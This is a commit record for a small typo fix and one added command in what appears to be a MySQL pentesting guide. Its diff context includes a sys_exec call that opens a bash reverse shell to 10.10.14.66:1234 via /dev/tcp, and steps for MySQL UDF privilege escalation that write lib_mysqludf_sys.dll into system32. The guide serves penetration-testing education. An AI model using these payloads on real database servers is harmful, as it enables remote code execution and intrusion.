Merge pull request #607 from soutzis/soutzis-pentesting-mysql-patch1-typo

Small typo fix in example queries and an addition of a MySQL command
Carlos Polop 2023-03-27 11:39:26 +02:00 committed by GitHub
commit 605c7041f0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23


@ -72,6 +72,7 @@ CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
```bash
show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;
@ -255,7 +256,7 @@ select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_files('C://temp//lib_mysqludf_sys.dll'));
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';